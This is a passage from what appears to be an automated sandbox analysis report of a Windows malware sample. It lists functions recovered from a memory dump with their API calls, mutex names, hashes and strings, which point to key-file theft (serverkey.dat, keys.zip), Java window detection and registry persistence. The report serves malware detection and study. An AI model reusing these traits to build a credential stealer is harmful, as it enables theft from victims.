                                                                                                                                                                                                                • Part of subcall function 012E74A0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 012E7594
                                                                                                                                                                                                                • Part of subcall function 012E74A0: HeapValidate.KERNEL32(00000000), ref: 012E759B
                                                                                                                                                                                                              • RtlImageNtHeader.NTDLL ref: 013053BE
                                                                                                                                                                                                              • GetTickCount.KERNEL32(?,?,012F56AF), ref: 013053D2
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(ntdll.dll,?,?,012F56AF), ref: 013053E3
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,RtlUniform,?,?,012F56AF), ref: 013053F3
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,012F56AF), ref: 01305430
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,?,012F56AF), ref: 01305433
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,012F56AF), ref: 01305440
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,012F56AF), ref: 01305443
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$File$Process$Validate$AddressAllocCountCreateFreeHandleHeaderImageLockModulePointerProcReadSizeTickUnlockmemset
                                                                                                                                                                                                              • String ID: RtlUniform$ntdll.dll
                                                                                                                                                                                                              • API String ID: 1595973673-3277137149
                                                                                                                                                                                                              • Opcode ID: a416a46c03a86a7f5f0e605492115bf63d7da60bf7523822efbbea71f3e9542c
                                                                                                                                                                                                              • Instruction ID: 12ea6e31d285267e3c6648f43cc9d0153546fd3bd249882aca631e464950ce8e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a416a46c03a86a7f5f0e605492115bf63d7da60bf7523822efbbea71f3e9542c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 94118E31741311ABEB31BF7A9C09FDB7AACEF85716F158528F905E6284DB35D6008BA0
                                                                                                                                                                                                              Function 01300110 Relevance: 17.5, APIs: 8, Strings: 2, Instructions: 47COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • FindWindowW.USER32(SunAwtFrame,0132A450,775B5180,012E1350,?,serverkey.dat), ref: 01300121
                                                                                                                                                                                                              • FindWindowW.USER32(SunAwtFrame,0132A488,?,serverkey.dat), ref: 01300131
                                                                                                                                                                                                              • FindWindowW.USER32(SunAwtFrame,0132A4B8,?,serverkey.dat), ref: 01300141
                                                                                                                                                                                                              • FindWindowW.USER32(SunAwtFrame,0132A4D8,?,serverkey.dat), ref: 01300151
                                                                                                                                                                                                              • FindWindowW.USER32(SunAwtDialog,0132A450,?,serverkey.dat), ref: 01300161
                                                                                                                                                                                                              • FindWindowW.USER32(SunAwtDialog,0132A488,?,serverkey.dat), ref: 01300171
                                                                                                                                                                                                              • FindWindowW.USER32(SunAwtDialog,0132A4B8,?,serverkey.dat), ref: 01300181
                                                                                                                                                                                                              • FindWindowW.USER32(SunAwtDialog,0132A4D8,?,serverkey.dat), ref: 01300191
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FindWindow
                                                                                                                                                                                                              • String ID: SunAwtDialog$SunAwtFrame
                                                                                                                                                                                                              • API String ID: 134000473-1757792087
                                                                                                                                                                                                              • Opcode ID: eadf578e099ccd5256a2c3f3c2f98c49e650f4902c6f222ecb3bdb9f85ce7fb3
                                                                                                                                                                                                              • Instruction ID: 0c0618aade3b166cca33dfee8a6e1fae97189ba4276b9f20c9a14218d90cdac1
                                                                                                                                                                                                              • Opcode Fuzzy Hash: eadf578e099ccd5256a2c3f3c2f98c49e650f4902c6f222ecb3bdb9f85ce7fb3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 97F059B87C2336AAD51A716F2D1AF6639C40B94CCD741401DF8C5B7B45E694E44115B1
                                                                                                                                                                                                              Function 012FB908 Relevance: 17.5, APIs: 6, Strings: 4, Instructions: 30sleepsynchronizationCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • OpenMutexA.KERNEL32(00100000,00000000,Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}), ref: 012FB91C
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 012FB925
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 012FB939
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 012FB94B
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61c5c09f), ref: 012FB956
                                                                                                                                                                                                              • Sleep.KERNEL32(00009C40,61c5c09f,ALPHA), ref: 012FB970
                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 012FB976
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HandleMutexSleep$BackslashCloseInformationOpenPathRelease
                                                                                                                                                                                                              • String ID: 61c5c09f$ALPHA$Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}$P0Mw
                                                                                                                                                                                                              • API String ID: 4280258085-2790425520
                                                                                                                                                                                                              • Opcode ID: 47cf15789ace78b5efa501313f9ad44ee68100a1b1f279c544dbdaa8ccaddaaf
                                                                                                                                                                                                              • Instruction ID: ba283dd45b4320de9330e29acea9fa5495c84d1c4fd059faf6f723908df447b9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 47cf15789ace78b5efa501313f9ad44ee68100a1b1f279c544dbdaa8ccaddaaf
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 81F0A7306993267AE6317F658C0AF9EB6D8AF49B09F00401CF745A1385C7F091089FA6
                                                                                                                                                                                                              Function 013032C8 Relevance: 17.5, APIs: 6, Strings: 4, Instructions: 30sleepsynchronizationCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}), ref: 013032DC
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 013032E5
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 013032F9
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0130330B
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61C5C435), ref: 01303316
                                                                                                                                                                                                              • Sleep.KERNEL32(00009C40,61C5C435,RFK), ref: 01303330
                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 01303336
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HandleMutexSleep$BackslashCloseInformationOpenPathRelease
                                                                                                                                                                                                              • String ID: 61C5C435$Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}$P0Mw$RFK
                                                                                                                                                                                                              • API String ID: 4280258085-2898694334
                                                                                                                                                                                                              • Opcode ID: 6b5f5d8e375e60abcc8f29a313b352f978257e65ef0fe5ea075d03305645bdf9
                                                                                                                                                                                                              • Instruction ID: 0226e3f7be2cc81b58476f75b1f3fb8dcdba769371dc9ad2bd5969ae3e695c03
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6b5f5d8e375e60abcc8f29a313b352f978257e65ef0fe5ea075d03305645bdf9
                                                                                                                                                                                                              • Instruction Fuzzy Hash: AAF082306463116EE2327B659C1AB9EBBDC7F45B0AF00401CFB45A22C5CBF481058B66
                                                                                                                                                                                                              Function 012F01A0 Relevance: 16.6, APIs: 11, Instructions: 115memorynetworkCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,00000823), ref: 012F01F4
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 012F020C
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 012F020F
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 012F021C
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 012F021F
                                                                                                                                                                                                              • InternetQueryOptionA.WININET(?,00000022,00000000,-0132FAE4), ref: 012F023C
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000014), ref: 012F0259
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 012F0260
                                                                                                                                                                                                              • memset.MSVCRT(00000000,00000000,00000014), ref: 012F0270
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,?), ref: 012F02B5
                                                                                                                                                                                                              • memcpy.MSVCRT(?,00000000,?,?,00000000,?), ref: 012F02C9
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Processmemset$AllocFreeInternetOptionQueryValidatememcpy
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3911349929-0
                                                                                                                                                                                                              • Opcode ID: 167d8fd6356df3c43b6f2f9ec923f8437b972a9f400e1b6a6b0ecc6b641f56de
                                                                                                                                                                                                              • Instruction ID: fc4f48907aca4a0febade5e22755d1e916fcdf6455437f1551117d73b3b55505
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 167d8fd6356df3c43b6f2f9ec923f8437b972a9f400e1b6a6b0ecc6b641f56de
                                                                                                                                                                                                              • Instruction Fuzzy Hash: AA416D75A00305ABEB30EFA8DC84F5AB7BCEB54710F10856DFA4597281DA71AA048BA4
                                                                                                                                                                                                              Function 012F0050 Relevance: 16.6, APIs: 11, Instructions: 96memorynetworkCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,00000823), ref: 012F0071
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 012F008C
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 012F008F
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 012F009C
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 012F009F
                                                                                                                                                                                                              • InternetQueryOptionA.WININET(?,00000022,00000000,?), ref: 012F00BC
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000014), ref: 012F00D9
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 012F00E0
                                                                                                                                                                                                              • memset.MSVCRT(00000000,00000000,00000014), ref: 012F00F0
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,00000002), ref: 012F0109
                                                                                                                                                                                                              • memcpy.MSVCRT(?,00000000,?,?,00000000,00000002), ref: 012F011C
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Processmemset$AllocFreeInternetOptionQueryValidatememcpy
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3911349929-0
                                                                                                                                                                                                              • Opcode ID: d9b1064389a86757e8d5743b8bd1896c07aea3fbd63fa7d4aa240f2e8282040d
                                                                                                                                                                                                              • Instruction ID: 18550e7e157dc1c07036fb133b91b02d5b4c5c7a8f185442500d280e7d229f4f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d9b1064389a86757e8d5743b8bd1896c07aea3fbd63fa7d4aa240f2e8282040d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3131A271641215ABE730EF58DC84F96BBACEF48710F048158FA489B286DA74A9018BF4
                                                                                                                                                                                                              Function 012EF3C0 Relevance: 16.5, APIs: 13, Instructions: 218memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?), ref: 012EF404
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 012EF40B
                                                                                                                                                                                                              • memset.MSVCRT(00000000,00000000,?), ref: 012EF41B
                                                                                                                                                                                                              • memcpy.MSVCRT(00000000,?,?,00000000,00000000,?), ref: 012EF426
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(?,00000000), ref: 012EF4EE
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 012EF4F5
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(?,00000000), ref: 012EF501
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 012EF508
                                                                                                                                                                                                              • memcpy.MSVCRT(?,00000000,?,?), ref: 012EF52E
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 012EF55A
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 012EF55D
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 012EF56A
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 012EF56D
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$FreeValidatememcpy$Allocmemset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1948005343-0
                                                                                                                                                                                                              • Opcode ID: 83ea95d848627f462cc0dfb6b189c9d75848cfecb4e711748226d50f83d3fabf
                                                                                                                                                                                                              • Instruction ID: c2c61840ed732ae4dc3541cf79b69380071be09bc66639087ac27dea41dd46a2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 83ea95d848627f462cc0dfb6b189c9d75848cfecb4e711748226d50f83d3fabf
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E761C772A1021A9BDB20DF5DD988AAEBBE8EF94720F448259FE05D7340D771D901C7E0
                                                                                                                                                                                                              Function 012E7B00 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 124registrymemoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,00000103), ref: 012E7B33
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,000000FF,?,00000000,00000103), ref: 012E7B4B
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(00000001,software\microsoft,00000000,00000101,?), ref: 012E7B6C
                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,00000104,00000000,00000001,?,00000104), ref: 012E7B92
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,?,?), ref: 012E7C1D
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?), ref: 012E7C24
                                                                                                                                                                                                              • memset.MSVCRT(00000000,00000000,?,?,?,?), ref: 012E7C33
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 012E7C63
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memset$Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                                              • String ID: software\microsoft
                                                                                                                                                                                                              • API String ID: 4158279268-3673152959
                                                                                                                                                                                                              • Opcode ID: f7455f270a356b93fe1265c27127bb8e7f4887fa35c776cfeb0cfbed8db4708b
                                                                                                                                                                                                              • Instruction ID: 01638d5f53b374acfca98487618ad32a59d1a625facc203eb5bb144af0647aea
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f7455f270a356b93fe1265c27127bb8e7f4887fa35c776cfeb0cfbed8db4708b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E241E67191015EAFDB25EF688C98AFE7BECAB59304F4041ACE745D3141E6704A498BE0
                                                                                                                                                                                                              Function 01304278 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 121synchronizationsleepCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(0133D19C), ref: 01304297
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(0133D19C,?,?), ref: 01304329
                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,Local\{EAF7722F-8989-4fe1-977D-95CD777C0214},?,?), ref: 013043B5
                                                                                                                                                                                                                • Part of subcall function 013059D0: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 013059EE
                                                                                                                                                                                                                • Part of subcall function 013059D0: GetSecurityDescriptorSacl.ADVAPI32(?,?,00000001,012E4C50,?,?,012E4C50,?,00000001), ref: 01305A0B
                                                                                                                                                                                                                • Part of subcall function 013059D0: SetNamedSecurityInfoA.ADVAPI32(?,012E4C50,00000010,00000000,00000000,00000000,00000001), ref: 01305A26
                                                                                                                                                                                                                • Part of subcall function 013059D0: LocalFree.KERNEL32(?,?,?,012E4C50,?,00000001), ref: 01305A37
                                                                                                                                                                                                              • Sleep.KERNEL32(000003E8,Local\{EAF7722F-8989-4fe1-977D-95CD777C0214},00000006), ref: 013043D2
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 013043D9
                                                                                                                                                                                                                • Part of subcall function 012E7310: GetHandleInformation.KERNEL32(00000000,00000000,?,?,0130564E,?,00000000), ref: 012E7324
                                                                                                                                                                                                                • Part of subcall function 012E7310: CloseHandle.KERNEL32(00000000,?,?,0130564E,?,00000000), ref: 012E7335
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Security$Descriptor$BackslashHandleMutexPath$CloseConvertCreateFreeInfoInformationLocalNamedReleaseSaclSleepString
                                                                                                                                                                                                              • String ID: Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}$P0Mw$keys.zip$path.txt
                                                                                                                                                                                                              • API String ID: 2697826820-3414533698
                                                                                                                                                                                                              • Opcode ID: f794a16223eba1b3727806660560b402a81c21dd7947b99b678854a2aa7b5301
                                                                                                                                                                                                              • Instruction ID: 6148ad28ad0647782f5a8708bf345f971b487c32bdac6727e9be586f0d4f64c8
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f794a16223eba1b3727806660560b402a81c21dd7947b99b678854a2aa7b5301
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 83410C3090475A4FCB37DF2C9479BEA7BE5AF4A304F1485D8E98AD7281DA718A48C784
                                                                                                                                                                                                              Function 012F48F0 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 103registrystringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • strstr.MSVCRT(?,013256DC), ref: 012F4902
                                                                                                                                                                                                              • #680.SHELL32 ref: 012F491A
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,00000103), ref: 012F4941
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(00000000,?,00000104), ref: 012F496F
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(?,software\microsoft,00000000,00000102,00000000,?,00000104), ref: 012F49CE
                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(00000000,00000000,00000000,00000001,00000000,00000001,?,software\microsoft,00000000,00000102,00000000,?,00000104), ref: 012F49FE
                                                                                                                                                                                                              • RegFlushKey.ADVAPI32(00000000,?,software\microsoft,00000000,00000102,00000000,?,00000104), ref: 012F4A0C
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000,?,software\microsoft,00000000,00000102,00000000,?,00000104), ref: 012F4A1A
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: #680CloseFlushOpenValuelstrcpynmemsetstrstr
                                                                                                                                                                                                              • String ID: software\microsoft
                                                                                                                                                                                                              • API String ID: 1680110384-3673152959
                                                                                                                                                                                                              • Opcode ID: 03bb4b314321ca39b3c0f501c992381b0f093ee8567ab5f91f59bc7f46975f67
                                                                                                                                                                                                              • Instruction ID: b49262c5335d48e12a318f219ce61147a82ccf5bdfde13ffabbef223ba81a37e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 03bb4b314321ca39b3c0f501c992381b0f093ee8567ab5f91f59bc7f46975f67
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 12312A31A1025EABDB22DF28DC59FEABBB8AF45701F1441A8EB44A7141D6F09748CB50
                                                                                                                                                                                                              Function 012E3910 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 86COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SymGetModuleBase.DBGHELP(?,?), ref: 012E3969
                                                                                                                                                                                                              • SymGetModuleInfo.DBGHELP(?,00000000,0000023C,?,?), ref: 012E397C
                                                                                                                                                                                                              • SymGetSymFromAddr.DBGHELP(?,?,?,00000018,?,00000000,0000023C,?,?), ref: 012E3993
                                                                                                                                                                                                              • _snprintf.MSVCRT(00000000,00001000,%s!%s + 0x%04x,?,?,?,?,?,?,00000018,?,00000000,0000023C,?,?), ref: 012E39BD
                                                                                                                                                                                                              • _snprintf.MSVCRT(00000000,00001000,%s!0x%08x,?,?,?,?,?,00000018,?,00000000,0000023C,?,?), ref: 012E39E1
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Module_snprintf$AddrBaseFromInfo
                                                                                                                                                                                                              • String ID: %s!%s + 0x%04x$%s!0x%08x$unknown!0x%08x
                                                                                                                                                                                                              • API String ID: 844136142-2194319270
                                                                                                                                                                                                              • Opcode ID: 42289802c98426e1511b3b03ec60005ad517c3b8a236155feb240cecaaa8e2e6
                                                                                                                                                                                                              • Instruction ID: 6f7583797657693264ec17694fc8d04f8cdb97f61b107f6edcd5873237d7dc7e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 42289802c98426e1511b3b03ec60005ad517c3b8a236155feb240cecaaa8e2e6
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B721F372600218ABE721DF09DC88FFA77ACFB44712F448199FA09D7141D7B09B48CBA0
                                                                                                                                                                                                              Function 01302800 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 77COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61C5C435), ref: 01302827
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000,?,?), ref: 01302867
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?), ref: 01302871
                                                                                                                                                                                                              • #680.SHELL32(?,?), ref: 01302879
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 0130288A
